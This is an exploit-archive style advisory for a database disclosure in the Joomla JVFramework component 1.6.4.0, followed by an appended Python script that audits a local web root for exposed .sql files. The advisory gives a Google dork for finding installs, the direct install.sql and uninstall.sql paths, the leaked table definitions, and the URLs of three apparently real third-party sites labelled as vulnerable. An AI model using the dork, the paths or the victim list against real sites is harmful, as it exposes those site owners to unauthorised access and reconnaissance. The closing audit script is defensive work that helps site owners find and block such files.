- ####################################################################
- # Exploit Title : Joomla JVFramework Components 1.6.4.0 Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 19/01/2019
- # Vendor Homepages : joomlavi.com ~ jvframework.com
- # Software Download Link :
- bestofjoomla.com/component/option,com_mtree/task,viewlink/link_id,2143/Itemid,95/
- # Software Information Link : sourceforge.net/projects/jvframework/
- # Software Affected Version : 1.6.4.0
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/administrator/components/com_jvframework/''
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
- CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
- ####################################################################
- # Description :
- **************
- *JV Framework brings you the power to handle your website in the most elegant way.
- *JV Framework has got the first-time deployed Drag and Drop feature.
- *JVFramework is an application framework for Java. Its main goal is to avoid code duplication
- (such as metadata, UI programming, etc.) related to the construction of a
- web application, providing a declarative language for business tier programming.
- ####################################################################
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_jvframework/installation/install.sql
- /administrator/components/com_jvframework/installation/uninstall.sql
- ####################################################################
- # Information : [ uninstall.sql ] =>
- ************
- -- --------------------------------------------------------
- DROP TABLE IF EXISTS `#__jv_themes`;
- -- --------------------------------------------------------
- DROP TABLE IF EXISTS `#__jv_theme_assign`;
- *******************************************
- # Information : [ install.sql ] =>
- -- -------------------------------------------------------------
- CREATE TABLE IF NOT EXISTS `#__jv_themes` (
- `id` int(11) NOT NULL AUTO_INCREMENT,
- `theme` varchar(50) NOT NULL,
- `home` tinyint(1) NOT NULL,
- `params` varchar(10240) NOT NULL,
- `published` tinyint(1) NOT NULL DEFAULT '0',
- PRIMARY KEY (`id`)
- ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
- -- -------------------------------------------------------------
- CREATE TABLE IF NOT EXISTS `#__jv_theme_assign` (
- `id` int(11) NOT NULL AUTO_INCREMENT,
- `menuid` int(11) NOT NULL,
- `themeid` int(11) NOT NULL,
- PRIMARY KEY (`id`)
- ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] legacyshare.org/administrator/components/com_jvframework/installation/install.sql
- [+] mbconsulting.al/administrator/components/com_jvframework/installation/uninstall.sql
- [+] lilpaws-malteserescue.org/main/administrator/components/com_jvframework/installation/install.sql
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
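
For site owners, a local audit of the web root for the condition described above, as an added example that is not part of the original post: it walks a document root on disk and lists every `.sql` file, marking those that sit in a component's `installation` directory under `administrator/components/`. The function names and the sample tree are hypothetical and constructed for the example; any file it reports is a candidate for denying at the web server.

```python
import os
import tempfile

def is_component_installer(parts):
    """True for .../administrator/components/<component>/installation/<file>."""
    for i in range(len(parts) - 4):
        if parts[i:i + 2] == ["administrator", "components"] and parts[i + 3] == "installation":
            return True
    return False

def find_web_readable_sql(docroot):
    """Return sorted (relative_path, is_installer_script) for each .sql file under docroot."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if name.lower().endswith(".sql"):  # also catches .SQL dumps
                rel = os.path.relpath(os.path.join(dirpath, name), docroot)
                parts = rel.split(os.sep)
                findings.append(("/".join(parts), is_component_installer(parts)))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample docroot, not taken from any real site."""
    for rel in (
        "administrator/components/com_jvframework/installation/install.sql",
        "administrator/components/com_jvframework/installation/uninstall.sql",
        "backups/site.SQL",
        "index.php",
    ):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("-- constructed sample\n")

def demo():
    """Run the audit against the constructed tree and return its findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return find_web_readable_sql(root)

if __name__ == "__main__":
    for rel, installer in demo():
        print(("installer-script " if installer else "other-sql        ") + rel)
```

On a real host, call `find_web_readable_sql()` with the path of the site's document root instead of the temporary tree.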